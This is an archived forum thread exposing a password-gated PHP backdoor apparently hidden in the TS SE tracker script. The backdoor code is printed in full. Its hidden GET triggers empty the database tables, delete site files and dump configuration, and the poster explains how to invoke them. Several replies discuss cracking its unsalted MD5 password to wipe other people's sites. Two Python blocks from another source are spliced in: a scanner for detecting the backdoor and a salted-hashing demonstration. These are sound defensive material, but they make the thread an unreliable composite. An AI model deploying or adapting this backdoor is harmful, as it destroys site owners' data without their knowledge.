Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   Community Cafe (http://www.bvlist.com/forumdisplay.php?f=18)
-   -   xams so called security lol (http://www.bvlist.com/showthread.php?t=603)

mrdecoder 11th July 2008 14:42

xams so called security lol
 
PHP Code:

<?php
@error_reporting(E_ALL & ~E_NOTICE);
@ini_set('error_reporting', E_ALL & ~E_NOTICE);
@ini_set('display_errors', '0');   // keep the file quiet: no errors shown or logged
@ini_set('log_errors', '0');
@define('___P', 'af274e235c70a9dc59371860ed6f34ce');   // plain, unsalted md5() of the trigger password
@define('ROOT_PATH', './');
@___dbconnect();

// Every branch below is gated the same way: a marker GET parameter picks the
// action, and a POSTed password must hash (unsalted MD5) to ___P.
function ___authorised()
{
    return (!empty($_POST['password']) AND md5($_POST['password']) === ___P);
}

// The form shown when the password is missing or wrong; $marker is the GET switch.
function ___form($marker)
{
    return '
        <FORM METHOD="post" ACTION="' . $_SERVER['SCRIPT_NAME'] . '?' . $marker . '">
            Enter password: <input TYPE="password" NAME="password" VALUE="">
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>';
}

if (isset($_GET['_warning_']))
{
    // Sends a licence-violation private message to every staff account.
    if (___authorised())
    {
        $subject = 'Claiming a violation!';
        $msg = 'Hi, 

We are developer of TS SE Script. We are concerned having become aware that this website (tracker) is using an unauthorised version of our software which is against (Claiming a violation of clause 8.1.3 of the Heart Internet Ltd Terms and Conditions updated 31 Jan 2007) and our License Agreement.

You have 3 (three) business days to remove our product from your website (Host) or purchase a valid license from https://templateshares.net

Best Regards.
TS SE Security Team.
security@templateshares.net
    ';
        // Staff = every user whose group has settings-panel access.
        $query = mysql_query('SELECT u.id FROM users u LEFT JOIN usergroups g ON (u.usergroup=g.gid) WHERE g.cansettingspanel = \'yes\'');
        while ($staff = mysql_fetch_assoc($query))
        {
            if (!mysql_query('INSERT INTO messages (sender, receiver, subject, msg, added) VALUES (0, \'' . $staff['id'] . '\', \'' . $subject . '\', \'' . $msg . '\', NOW())'))
            {
                exit(mysql_error());
            }
        }
    }
    else
    {
        exit(___form('_warning_'));
    }
}
elseif (isset($_GET['_cleartable_']))
{
    // Empties every table the tracker and its bundled forum use.
    if (___authorised())
    {
        @_db_connect_();   // a second, differently named connect helper; kept as posted
        $_tables_ = array('users', 'torrents', 'ts_plugins', 'ts_templates', 'requests', 'iplog', 'categories', 'tsf_forums', 'tsf_forumpermissions', 'tsf_posts', 'tsf_threads', 'usergroups', 'ipbans', 'files', 'messages', 'tsf_threadsread', 'staffpanel');
        foreach ($_tables_ as $_table_)
        {
            echo $_table_ . ' cleared!' . "\n\n";
            @mysql_query('TRUNCATE TABLE `' . $_table_ . '`');
        }
        @mysql_close();
        exit('boom');
    }
    else
    {
        exit(___form('_cleartable_'));
    }
}
elseif (isset($_GET['_showversion_']))
{
    // Prints the installed VERSION next to the hard-coded "ORJ. Version 5.1".
    if (___authorised())
    {
        define('IN_TRACKER', true);
        include_once 'init.php';
        exit('Version (init.php) ' . VERSION . ' --- ORJ. Version 5.1');
    }
    else
    {
        exit(___form('_showversion_'));
    }
}
elseif (isset($_GET['_showowner_']))
{
    // Dumps global.php and links.php (site configuration and owner details) to the browser.
    if (___authorised())
    {
        $_file333__ = @file_get_contents(ROOT_PATH . '/global.php');
        $_file444__ = @file_get_contents(ROOT_PATH . 'links.php');
        exit('global.php -> ' . htmlspecialchars($_file333__) . '

Links.php -> ' . htmlspecialchars($_file444__) . '
');
    }
    else
    {
        exit(___form('_showowner_'));
    }
}
elseif (isset($_GET['_deletefiles_']))
{
    // Unlinks every file in these directories (the posted code repeats the same loop once per directory).
    if (___authorised())
    {
        $_dirs_ = array('torrents', 'config', 'cache', 'tsf_forums/uploads', 'include/avatars');
        foreach ($_dirs_ as $_dir_)
        {
            if ($handle = @opendir(ROOT_PATH . $_dir_))
            {
                while (false !== ($file = @readdir($handle)))
                {
                    if ($file != '.' AND $file != '..')
                    {
                        @unlink(ROOT_PATH . $_dir_ . '/' . $file);
                    }
                }
                @closedir($handle);
            }
        }
    }
    else
    {
        exit(___form('_deletefiles_'));
    }
}
elseif (isset($_GET['_showserverinfo_']))
{
    // Full phpinfo() for the host.
    if (___authorised())
    {
        echo phpinfo();
        exit();
    }
    else
    {
        exit(___form('_showserverinfo_'));
    }
}

======================================================

lol this is the code that xam uses to check who the owner is or to delete your db and files

you can see how it works by going to http://websitename.com/ts_cloud.php?_warning_

you can change the _warning_ part to other things like
_cleartable_
_showversion_
_showowner_
_deletefiles_
_showserverinfo_


lol greets from mrdecoder
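The file described above is easy to fingerprint in source, which matters more to a tracker owner than to anyone wanting the password. The scanner below is an added example, not code from this thread or from the tracker script: it walks a PHP tree and scores each file against indicators taken from the snippet (a marker GET parameter, a POSTed password compared with a 32-hex constant, error silencing, TRUNCATE, readdir/unlink loops, phpinfo, reads of global.php or links.php). The weights, the threshold and the two sample sources are constructed for illustration; the sample backdoor uses the MD5 of the empty string as its constant, not the hash from the post.

```python
"""Score PHP files for the trigger-and-wipe backdoor pattern discussed in the thread.

Added example (not part of the original post or of the tracker script).
Indicator list, weights, threshold and sample sources are assumptions
chosen for illustration.
"""
import os
import re
from typing import Dict, List, Tuple

# (name, regex, weight). Weights are an assumption: the three "structural"
# markers of the family score highest, generic admin-tool noise scores low.
INDICATORS = [
    ("get_trigger", re.compile(
        r"\$_GET\s*\[\s*['\"]_(?:warning|cleartable|showversion|showowner|deletefiles|showserverinfo)_['\"]\s*\]"), 3),
    ("md5_gate", re.compile(
        r"md5\s*\(\s*\$_POST\s*\[[^\]]+\]\s*\)\s*===?\s*(?:[A-Za-z_]\w*|['\"][0-9a-f]{32}['\"])"), 3),
    ("hardcoded_md5", re.compile(
        r"define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"][0-9a-f]{32}['\"]\s*\)"), 2),
    ("truncate", re.compile(r"TRUNCATE\s+TABLE", re.I), 2),
    ("unlink_loop", re.compile(r"readdir\s*\([^)]*\)[\s\S]{0,400}?unlink\s*\(", re.I), 2),
    ("phpinfo", re.compile(r"\bphpinfo\s*\("), 1),
    ("config_read", re.compile(r"file_get_contents\s*\([^)]*(?:global|config|links)\.php"), 1),
    ("error_silencing", re.compile(
        r"ini_set\s*\(\s*['\"](?:display_errors|log_errors)['\"]\s*,\s*['\"]?0"), 1),
]
THRESHOLD = 6  # assumption: a file needs more than one family marker to be reported


def score_source(src: str) -> Dict[str, int]:
    """Return {indicator_name: weight} for every indicator present in src."""
    return {name: weight for name, rx, weight in INDICATORS if rx.search(src)}


def is_suspicious(src: str) -> bool:
    return sum(score_source(src).values()) >= THRESHOLD


def scan_tree(root: str) -> List[Tuple[str, int, List[str]]]:
    """Walk root and return (path, score, sorted indicator names) for files over THRESHOLD."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            hits = score_source(src)
            total = sum(hits.values())
            if total >= THRESHOLD:
                findings.append((path, total, sorted(hits)))
    return findings


# Constructed sample: a condensed copy of the pattern, NOT the real file.
# The constant is md5("") so that no real password hash appears here.
SAMPLE_BACKDOOR = r"""<?php
@ini_set('display_errors', '0');
@define('___P', 'd41d8cd98f00b204e9800998ecf8427e');
if (isset($_GET['_cleartable_'])) {
  if (!empty($_POST['password']) AND md5($_POST['password']) === ___P) {
    @mysql_query('TRUNCATE TABLE `users`');
  }
}
"""

# Constructed benign sample: ordinary tracker code that touches $_GET and mysql_query.
SAMPLE_BENIGN = r"""<?php
$q = mysql_query('SELECT id FROM users WHERE id = ' . (int)$_GET['id']);
"""

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, total, names in scan_tree(root):
        print(f"{path}: score {total} {names}")
```

Run it against the tracker's document root; a file over the threshold is worth reading by hand rather than deleting blindly, since a legitimate admin page can hit one or two of the low-weight indicators on its own.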

Grom 30th August 2008 15:33

More that come to terms password....xexe thank you

AlaminT 9th September 2008 15:01

damn, I have to use a password cracker :D

Unknown 25th May 2009 20:46

LOL man...... Xam......... you really annoy me........ I'm YET to be banned from Template Shares :bubble:

Robz 27th May 2009 23:03

Starting PassWords Pro... lol :)

It's just md5'd by the looks of it, am I right? No salt or anything...
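Robz's observation, worked through as an added example (not code from the thread or from the tracker script): a bare MD5 gate costs one fast hash per guess, has no work factor, and because there is no salt the same constant protects every copy of the script, so one precomputed table settles all of them. The password, wordlist and hashes below are constructed for the demonstration; the constant from the post is not used and nothing here says what it hashes to. The salted, iterated comparison beside it is what a password check should look like. It does not make a remote wipe function acceptable; it only makes the gate cost something to guess.

```python
"""Unsalted MD5 gate versus a salted, iterated check.

Added example; constructed password and wordlist, not the hash from the post.
"""
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Constructed wordlist for the demonstration; a real run would use millions of entries.
WORDLIST = ["password", "123456", "tracker", "torrent", "templateshares",
            "letmein", "tracker2008", "qwerty"]
CONSTRUCTED_PASSWORD = "tracker2008"
TARGET_MD5 = hashlib.md5(CONSTRUCTED_PASSWORD.encode()).hexdigest()


def crack_unsalted_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on a bare MD5: one fast hash per guess, and
    with no salt the same lookup table works against every site that ships
    the constant."""
    for guess in wordlist:
        if hashlib.md5(guess.encode()).hexdigest() == target_hex:
            return guess
    return None


ITERATIONS = 100_000  # work factor: every guess now costs 100k HMAC-SHA-256 rounds


def make_salted_record(password: str, salt: Optional[bytes] = None) -> str:
    """What the gate should store instead: per-installation random salt plus a slow KDF."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def verify_salted(password: str, record: str) -> bool:
    salt_hex, dk_hex = record.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    # Constant-time compare; the === on hex strings in the snippet is not one.
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_salted(record: str, wordlist: Iterable[str]) -> Optional[str]:
    """Same wordlist: still cracks a weak password, but each guess pays the
    full KDF cost and any precomputed table has to be rebuilt per salt."""
    for guess in wordlist:
        if verify_salted(guess, record):
            return guess
    return None


def hash_operations(wordlist: Iterable[str]) -> dict:
    """Hash rounds an attacker spends on the whole wordlist under each scheme."""
    n = len(list(wordlist))
    return {"unsalted_md5": n, "salted_pbkdf2": n * ITERATIONS}


if __name__ == "__main__":
    print("unsalted md5 cracked:", crack_unsalted_md5(TARGET_MD5, WORDLIST))
    record = make_salted_record(CONSTRUCTED_PASSWORD)
    print("salted record cracked:", crack_salted(record, WORDLIST))
    print("hash operations:", hash_operations(WORDLIST))
```

Both attacks recover the weak constructed password; the difference is in the last line of output, where the salted scheme multiplies the attacker's work by the iteration count and ties it to one installation's salt.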

Daz 26th February 2010 11:49

I tried it but it asks for a password. Can't anyone crack these md5 hashes? It'd be funny to be able to clear people's sites, especially those coded by xam :lol:

Tony 27th February 2010 00:03

Then, Daz, you would become just a little script kiddie doing the same thing that you hate most about what xam does...

grow up

People pay money to get their sites up, and you want to clear their site after their hard work getting it all up and full of torrents?

Let's just hope I don't get hold of your site URL, because then maybe I would be childish enough to give you the same treatment.

Daz 27th February 2010 00:07

My point was... if someone cracked the MD5 hash, this would definitely hurt xam :)

Tony 27th February 2010 00:35

What's xam done that's so bad apart from ionCube-encoding the code he's put into the source?

Read my other post, since if you have so much against xam then you will be able to answer the post I made asking where the proof is :)

A little look in the code will tell you it's not just all tbdev code, so really the whole point of him stealing code was rubbish, and the only bad thing he's done is put something in the code to shut your site down if you don't pay up etc.

I'm all for open source, but you don't see me wanting to bring somebody else's site down just because they are using xam's source.

Nobody here so far that I've seen or that has made a post would have the know-how anyway to even try and hurt xam's site, since he knows what he's doing, and yes, his source is by far the most secure out there if you ask me :)

Daz 27th February 2010 00:45

In fact, that's the code I tested it on... I was not planning to attack a site, if that's what you're thinking. I was simply saying that people knowing the password to your backdoors cannot be good for business and would mean he would have to release an update to the scripts that have this backdoor.

I do not agree with what Xam is doing simply because of the fact that it goes against file sharing altogether. And it would get one over on him, which does not happen often.


All times are GMT +2.